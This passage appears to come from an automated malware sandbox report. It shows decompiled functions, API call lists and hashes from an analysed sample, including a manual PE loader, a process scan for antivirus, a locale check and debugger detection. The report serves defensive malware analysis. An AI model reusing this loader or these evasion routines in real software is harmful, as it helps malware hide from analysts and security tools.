Part of subcall function 00DC7404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DC76F9,004F0053,00000000,?), ref: 00DC7437
Part of subcall function 00DC7404: memset.NTDLL ref: 00DC744B

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00DC7728
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00DC7744
RegCloseKey.ADVAPI32(00000000), ref: 00DC7755

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: a0526893eb15a4246304535d340d5a25f176f38ca9b5d93dfc7c3611141db337
Instruction ID: 44f2727e1bda99a49a77f5d822fed26d2a6f10aba66317d0c08282263cad6e11
Opcode Fuzzy Hash: a0526893eb15a4246304535d340d5a25f176f38ca9b5d93dfc7c3611141db337
Instruction Fuzzy Hash: 7911F7B250420BAFDB11DBD9DD85FAEB7BCAB44700F1800A9B601E7191DB74DA059B34

Uniqueness

Uniqueness Score: -1.00%

Function 00DCA5D1, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				signed int _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement( &E00DCD1F4) == 0) {
						E00DC310C();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement( &E00DCD1F4) == 1) {
						_t10 = E00DC8714(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x00dca5d8
0x00dca5d9
0x00dca5dc
0x00dca60e
0x00dca610
0x00dca610
0x00dca5de
0x00dca5df
0x00dca5f4
0x00dca5fb
0x00dca5fd
0x00dca5fd
0x00dca5fb
0x00dca5df
0x00dca618

APIs

InterlockedIncrement.KERNEL32(00DCD1F4), ref: 00DCA5E6

Part of subcall function 00DC8714: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DC8729

InterlockedDecrement.KERNEL32(00DCD1F4), ref: 00DCA606

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: a1547f005b2b2608b5c035a65c6c01f72f82bf9a0cc263d410fd1b3133e1ae25
Instruction ID: bb307fba82f86dcabe35e42cb5af91bed4298bec9e3f2a103182c87d27a604cb
Opcode Fuzzy Hash: a1547f005b2b2608b5c035a65c6c01f72f82bf9a0cc263d410fd1b3133e1ae25
Instruction Fuzzy Hash: D1E04F2128462B9F862127AD8C08F6AFE519B10B8CB0C612CF745D3051E610CC9097B7

Uniqueness

Uniqueness Score: -1.00%

Function 7029DA16, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

IsValidLocaleName.KERNELBASE(?,7029E4DF,?,00000055,?,-00000050,?,?,00000004), ref: 7029DA32
IsValidLocale.KERNEL32(00000000,?,00000000,00000001,?,?,7029E4DF,?,00000055,?,-00000050,?,?,00000004), ref: 7029DA43

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: LocaleValid$Name
String ID:
API String ID: 1113214789-0
Opcode ID: 394313960919f03a92cc9bdbf3d2deb77ba9cb009cae05ecb1704495e9f31738
Instruction ID: 88d7d71ca8933434c01e61e09bced63f4e1514c8110f44f14e1a53f766a08a1a
Opcode Fuzzy Hash: 394313960919f03a92cc9bdbf3d2deb77ba9cb009cae05ecb1704495e9f31738
Instruction Fuzzy Hash: 46E08C33524224ABCA222B628C0DB8E7E199B40790F100021B90676150CE61D832AAD8

Uniqueness

Uniqueness Score: -1.00%

Function 70252020, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E70252020(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E702517C2( &_v8,  &_v12,  *0x7025414c ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E7025157D(_t22, _v8,  *0x7025414c ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E7025111B(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x70254110, 0, _v8);
				}
				return _t25;
			}

0x70252020
0x70252023
0x70252024
0x7025203a
0x70252043
0x70252048
0x70252061
0x7025204a
0x7025205d
0x7025205d
0x70252065
0x7025206f
0x70252077
0x7025207f
0x70252081
0x70252081
0x7025207f
0x70252091
0x70252091
0x7025209c

APIs

StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 70252077
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 70252091

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5b4ad28c2cfe9a056ebeb6971a89c352b2021b8a4025a6ac743207ccde0eaa0d
Instruction ID: 4aac1600a2ee7e5c4fe4b862054cc6022ce5c75943791724378d01a8dd8e325e
Opcode Fuzzy Hash: 5b4ad28c2cfe9a056ebeb6971a89c352b2021b8a4025a6ac743207ccde0eaa0d
Instruction Fuzzy Hash: 0401D477A01215BFCB018FA2CD44F9FBBBCAB95640F2100D5B902E3180D630DA18EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 7028F1C0, Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,702C0918,702C0944,702C1B60,?), ref: 7028F442

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3cb64cf31ed4407cf33835cc968d3ab81aac5dc4d7f068972e91582f169e3590
Instruction ID: 09419b6083e98d2da7d22a3bd03bd8a4ceaf493cceaac77bee4588928909f59d
Opcode Fuzzy Hash: 3cb64cf31ed4407cf33835cc968d3ab81aac5dc4d7f068972e91582f169e3590
Instruction Fuzzy Hash: BC914A77A02245DFD749CFAAC9D8B6EBBB2FB98300F208259D441D73A5D3345A40EB90

Uniqueness

Uniqueness Score: -1.00%

Function 702A6CA2, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 7029C672: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 7029C6B3

_free.LIBCMT ref: 702A6D11

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 44dd9ba930deb4f99e748e46f71780d5b418487e0580e040bd0d27dcf69e28f5
Instruction ID: 4850a16a508112629ae23acad81c6c3595c31c5fcd8335ce49f9cfcf34804309
Opcode Fuzzy Hash: 44dd9ba930deb4f99e748e46f71780d5b418487e0580e040bd0d27dcf69e28f5
Instruction Fuzzy Hash: 0601FEB36043169FC3218F58C48598DFB9DEB453B0F110629E556B76C0DB706D24CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 7029DE9B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 7029C672: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 7029C6B3

_free.LIBCMT ref: 7029DEBB

Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 23c9956c058ca3540ffba92d896f040b0d6f67a41798eeaeb4e8479166d7f937
Instruction ID: edb1629c97fe4fa914f5db6c480f25c055536ed57958e613343349dd4c1fdbd0
Opcode Fuzzy Hash: 23c9956c058ca3540ffba92d896f040b0d6f67a41798eeaeb4e8479166d7f937
Instruction Fuzzy Hash: F80108B6D00219AFCB10CFA9C841B9EBBB8FB48710F104166EA15E7240E770AA54CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 7029C672, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 7029C6B3

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 922e35e65946b4c782fee1981499c218e0b9b676704d0b8cf0bee7ac34a46f63
Instruction ID: 2cb0c5baf4e3b05371900c69f1ce9386817ee670e782348e1619572b48023a22
Opcode Fuzzy Hash: 922e35e65946b4c782fee1981499c218e0b9b676704d0b8cf0bee7ac34a46f63
Instruction Fuzzy Hash: 71F0B4336252266ADB115E66CD05B4F376C9FC1670B31A02AEC07B61B4CA20E8204EA9

Uniqueness

Uniqueness Score: -1.00%

Function 702516C3, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E702516C3(void* __eax, void* __edx) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t36;
				intOrPtr _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E70251A07( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t34 = _v8;
					_t28 = E70251B1D( &_v8, _t34, _t35);
					if(_t28 == 0) {
						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
						_t23 = E702512D5(_t34, _t38); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E70251F74(_t38, _t31, _t34); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t34);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
					E702515C4(_t36);
					L8:
					return _t28;
				}
			}

0x702516c3
0x702516cb
0x702516e8
0x702516ef
0x7025174e
0x00000000
0x702516f1
0x702516f1
0x702516fb
0x702516ff
0x70251704
0x70251708
0x7025170d
0x70251711
0x70251716
0x7025171b
0x7025171f
0x70251724
0x70251725
0x70251729
0x7025172e
0x70251736
0x70251736
0x7025172e
0x7025171f
0x70251711
0x70251738
0x70251741
0x70251745
0x7025174f
0x70251755
0x70251755

APIs

Part of subcall function 70251A07: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,702516ED,?,?,?,00000002,?,?,?), ref: 70251A2C
Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A4E
Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A64
Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A7A
Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A90
Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251AA6

Part of subcall function 70251B1D: memcpy.NTDLL(?,00000002,702516FB,?,0000000A,?,?,?,702516FB,?,0000000A,?,?,?,00000002), ref: 70251B4A
Part of subcall function 70251B1D: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 70251B7D

Part of subcall function 702512D5: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 7025130B
Part of subcall function 702512D5: lstrlenA.KERNEL32(00000002), ref: 70251321
Part of subcall function 702512D5: memset.NTDLL ref: 7025132B
Part of subcall function 702512D5: GetProcAddress.KERNEL32(?,00000002), ref: 7025138E
Part of subcall function 702512D5: lstrlenA.KERNEL32(-00000002), ref: 702513A3
Part of subcall function 702512D5: memset.NTDLL ref: 702513AD

Part of subcall function 70251F74: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 70251FA2
Part of subcall function 70251F74: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 70251FF9
Part of subcall function 70251F74: GetLastError.KERNEL32(?,?), ref: 70251FFF

GetLastError.KERNEL32(?,?,?,?), ref: 70251730

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: a3943949b74913ba6821ad51d2602250a7986f2029d3c2a90ea505299250dc63
Instruction ID: 42da3a7c37eecf15f920a6dd2e5d1870f5b111fb77e5218c18ab679b89de0d11
Opcode Fuzzy Hash: a3943949b74913ba6821ad51d2602250a7986f2029d3c2a90ea505299250dc63
Instruction Fuzzy Hash: 7811C6377007126BD7125AAD8C85E9FB7FCAF49214B4001A8F901E7340EBB4FC198768

Uniqueness

Uniqueness Score: -1.00%

Function 702C21BC, Relevance: 1.3, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?), ref: 702C21D6

Memory Dump Source

Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7a29d108586aff7e067c09f4ec5a85883207dfaed275dae7e02901baf4074659
Instruction ID: d2ad9aae15b4fc13e01a02c7546be1d0046266737c15b4f8ed9fa99d4dd6a60c
Opcode Fuzzy Hash: 7a29d108586aff7e067c09f4ec5a85883207dfaed275dae7e02901baf4074659
Instruction Fuzzy Hash: 1BE08632144100BFEB04CF94CC95F927B95EBE5710F180098ED08AF3C9DBB035108664

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 702A5349, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,gV*p,00000002,00000000,?,?,?,702A5667,?,00000000), ref: 702A53E2
GetLocaleInfoW.KERNEL32(?,20001004,gV*p,00000002,00000000,?,?,?,702A5667,?,00000000), ref: 702A540B
GetACP.KERNEL32(?,?,702A5667,?,00000000), ref: 702A5420

Strings

OCP, xrefs: 702A539D
ACP, xrefs: 702A5367
gV*p, xrefs: 702A53FC, 702A5419, 702A53D3, 702A53EC, 702A53D6, 702A53FF

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP$gV*p
API String ID: 2299586839-3046050243
Opcode ID: 27c6a05eaa8be87064fd223c38283d1b9c8358608895a653041e3d01f44f5134
Instruction ID: 0313a4e469eacd0180566e4ec9b56b7b7a3934935939007b70fc24ab558b0f81
Opcode Fuzzy Hash: 27c6a05eaa8be87064fd223c38283d1b9c8358608895a653041e3d01f44f5134
Instruction Fuzzy Hash: 5F2153E3610122AADB258F15C905A8F73B7EB84B91B5284A4ED07DB104EF72DDA5C750

Uniqueness

Uniqueness Score: -1.00%

Function 702A551E, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D13A
Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D170

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 702A562A
IsValidCodePage.KERNEL32(00000000), ref: 702A5673
IsValidLocale.KERNEL32(?,00000001), ref: 702A5682
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 702A56CA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 702A56E9

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: d0a6079cd0ac59e866de613702b287717bc3f992fd872aff452e04026c5abfea
Instruction ID: be8a49f234e8b1772a324ea9554e333ce535761a108f6a0e6f8c45d16a17af3b
Opcode Fuzzy Hash: d0a6079cd0ac59e866de613702b287717bc3f992fd872aff452e04026c5abfea
Instruction Fuzzy Hash: 48515EB3A10216AFDB00DFA5CD45BAF77BDAF48710F904469ED16EB150EF70A9208B61

Uniqueness

Uniqueness Score: -1.00%

Function 702C2390, Relevance: 6.1, APIs: 4, Instructions: 130memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(70250000,00000000,00000004,702C20F8), ref: 702C23A8
VirtualProtect.KERNEL32(00000000,?,00000002,702C20F8), ref: 702C249C
VirtualProtect.KERNEL32(00000000,?,00000002,702C20F8,?), ref: 702C24F2
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 702C250E

Memory Dump Source

Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false

Similarity

API ID: Virtual$Protect$Free
String ID:
API String ID: 3866829018-0
Opcode ID: 1934eca9a044f4914c454d14603cce44b96784b821f3975630d3290fa4c363fa
Instruction ID: d3b4db10c5d6c2296c19dc8fb52278168408b0ee22f3210be340533835d7fa95
Opcode Fuzzy Hash: 1934eca9a044f4914c454d14603cce44b96784b821f3975630d3290fa4c363fa
Instruction Fuzzy Hash: 29513733500101AFDB21CF84C880F56B7BAEF98710B1942A4FD095F75ADB35A9759B60

Uniqueness

Uniqueness Score: -1.00%

Function 00DC31DD, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00DC31DD() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xdcd230; // 0x434a5a8
						_t2 = _t9 + 0xdcedf8; // 0x73617661
						_push( &_v264);
						if( *0xdcd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00dc31e8
0x00dc31f2
0x00dc31f6
0x00dc3200
0x00dc3231
0x00dc3207
0x00dc320c
0x00dc3219
0x00dc3222
0x00dc3239
0x00dc3224
0x00dc322c
0x00000000
0x00dc322c
0x00dc323a
0x00dc323b
0x00000000
0x00dc323b
0x00000000
0x00dc3235
0x00dc3241
0x00dc3246

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DC31ED
Process32First.KERNEL32(00000000,?), ref: 00DC3200
Process32Next.KERNEL32(00000000,?), ref: 00DC322C
CloseHandle.KERNEL32(00000000), ref: 00DC323B

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 1c3b248e37482fe03046cd86623c15609b32f596a6601438223e7a3bdf7a4e25
Instruction ID: 48e934eee6783a76ea882f674ac52f7c6eb8c83967566781651eb92813af99d6
Opcode Fuzzy Hash: 1c3b248e37482fe03046cd86623c15609b32f596a6601438223e7a3bdf7a4e25
Instruction Fuzzy Hash: 06F024721001676BDF20A72A9C09FEBB7ACEBC5310F000069F949D3100EB24DB868AB9

Uniqueness

Uniqueness Score: -1.00%

Function 70251756, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E70251756() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x70254130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x7025413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x7025412c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x70254128 = _t5;
					 *0x70254130 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x70254124 = _t6;
					if(_t6 == 0) {
						 *0x70254124 =  *0x70254124 | 0xffffffff;
					}
					return 0;
				}
			}

0x70251757
0x70251765
0x7025176d
0x70251772
0x702517bc
0x702517bc
0x70251774
0x7025177c
0x702517b8
0x702517ba
0x7025177e
0x7025177e
0x70251783
0x70251791
0x70251796
0x7025179c
0x702517a4
0x702517a9
0x702517ab
0x702517ab
0x702517b5
0x702517b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,7025117E), ref: 70251765
GetVersion.KERNEL32(?,7025117E), ref: 70251774
GetCurrentProcessId.KERNEL32(?,7025117E), ref: 70251783
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,7025117E), ref: 7025179C

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 48c434754f01ae0b469864c2054afd3fe7504d2bad86307d704972bc26512ca0
Instruction ID: bdd8fae891cc92f1708b01fa06a89dbd61b304cbb48815e7938fe35fdcf57493
Opcode Fuzzy Hash: 48c434754f01ae0b469864c2054afd3fe7504d2bad86307d704972bc26512ca0
Instruction Fuzzy Hash: F8F01D736597109BDB419F7BAC0D744BBA4A718726F3081D9F64AC51E0E7B08481AF5C

Uniqueness

Uniqueness Score: -1.00%

Function 702A4FD0, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D13A
Part of subcall function 7029D0D8: _free.LIBCMT ref: 7029D170

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A5024
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A506E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 702A5134

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: 7bb3e3d43e5562c4e785da6e935a282816ce81ecaaf94defd4c3b1ac271a72bb
Instruction ID: cc67281bcb1711010764c1e8de1d24dc24cf495322f1e881c1c178a2fb9adfc0
Opcode Fuzzy Hash: 7bb3e3d43e5562c4e785da6e935a282816ce81ecaaf94defd4c3b1ac271a72bb
Instruction Fuzzy Hash: A2616CB25102279FDB198E24CD82BAF77B9EF04300F2041BAED16D6584EB35E9A5DF50

Uniqueness

Uniqueness Score: -1.00%

Function 70299747, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7029983F
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 70299849
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 70299856

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 50530b3816c87ccd3bec1967d1b2e9dd5d1ab9e78cc242fda852d36e1d1606bd
Instruction ID: 7a4f93846b39a5fe8af97b61bb31320a6eb8fc44f1733899d6d507111f975694
Opcode Fuzzy Hash: 50530b3816c87ccd3bec1967d1b2e9dd5d1ab9e78cc242fda852d36e1d1606bd
Instruction Fuzzy Hash: 4731D87591122C9BCB21DF64DC88BCDBBB8BF08310F6041DAE41DA7250EB709B918F59

Uniqueness

Uniqueness Score: -1.00%

Function 7025111B, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E7025111B(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x7025111f
0x70251130
0x70251138
0x7025113a
0x7025114d
0x7025114d
0x70251157

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,7025206C,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 70251130
GetSystemDefaultUILanguage.KERNEL32(?,?,7025206C,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 7025113A
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,7025206C,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 7025114D

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 5a21a4afd574772d4f0a99577815051967a7f68fe0543458e1cab7cfe49002b1
Instruction ID: 62695af70ee757eb438f5b21de534e3d2d87ddb4ea997be464837ef16d366980
Opcode Fuzzy Hash: 5a21a4afd574772d4f0a99577815051967a7f68fe0543458e1cab7cfe49002b1
